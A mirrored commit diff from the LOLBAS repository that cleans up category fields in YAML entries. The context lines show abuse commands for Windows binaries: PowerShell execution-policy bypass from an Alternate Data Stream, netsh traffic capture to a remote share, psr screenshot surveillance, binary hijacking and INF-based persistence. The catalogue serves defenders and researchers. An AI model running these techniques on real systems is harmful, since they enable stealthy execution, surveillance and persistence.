mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 23:05:58 +02:00 
			
		
		
		
	Remove/fix unnecessary Categories field
This commit is contained in:
		| @@ -3,7 +3,6 @@ Name: Explorer.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: explorer.exe calc.exe | ||||
|     Description: 'Executes calc.exe as a subprocess of explorer.exe.' | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Netsh.exe | ||||
| Description: Execute, Surveillance | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: | | ||||
|           netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>) | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Nltest.exe | ||||
| Description: Credentials | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: nltest.exe /SERVER:192.168.1.10 /QUERY | ||||
|     Description: '' | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Openwith.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: OpenWith.exe /c C:\test.hta | ||||
|     Description: Opens the target file with the default application. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Powershell.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: powershell -ep bypass - < c:\temp:ttt | ||||
|     Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Psr.exe | ||||
| Description: Surveillance | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip | ||||
|     Description: Capture screenshots of the desktop and save them in the target .ZIP file. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Robocopy.exe | ||||
| Description: Copy | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Robocopy.exe C:\SourceFolder C:\DestFolder | ||||
|     Description: Copy the entire contents of the SourceFolder to the DestFolder. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: AcroRd32.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary | ||||
|     Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Gpup.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe | ||||
|     Description: Execute another command through gpup.exe (Notepad++ binary). | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Nlnotes.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | ||||
|     Description: Run PowerShell via LotusNotes. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Notes.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | ||||
|     Description: Run PowerShell via LotusNotes. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Nvudisp.exe | ||||
| Description: Execute, Copy, Add registry, Create shortcut, kill process | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Nvudisp.exe System calc.exe | ||||
|     Description: Execute calc.exe as a subprocess. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Nvuhda6.exe | ||||
| Description: Execute, Copy, Add registry, Create shortcut, kill process | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: nvuhda6.exe System calc.exe | ||||
|     Description: Execute calc.exe as a subprocess. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: ROCCAT_Swarm.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe | ||||
|     Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Setup.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Run Setup.exe | ||||
|     Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Usbinst.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" | ||||
|     Description: Execute calc.exe through DefaultInstall Section Directive in INF file. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: VBoxDrvInst.exe | ||||
| Description: Persistence | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf | ||||
|     Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe | ||||
|   | ||||
| @@ -6,14 +6,14 @@ Created: 2018-05-25 | ||||
| Commands: | ||||
|   - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out | ||||
|     Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). | ||||
|     Categories: Execution | ||||
|     Category: Execution | ||||
|     Privileges: User | ||||
|     MitreID: T1064 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1064 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out | ||||
|     Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). | ||||
|     Categories: Execution | ||||
|     Category: Execution | ||||
|     Privileges: User | ||||
|     MitreID: T1064 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1064 | ||||
|   | ||||
		Reference in New Issue
	
	Block a user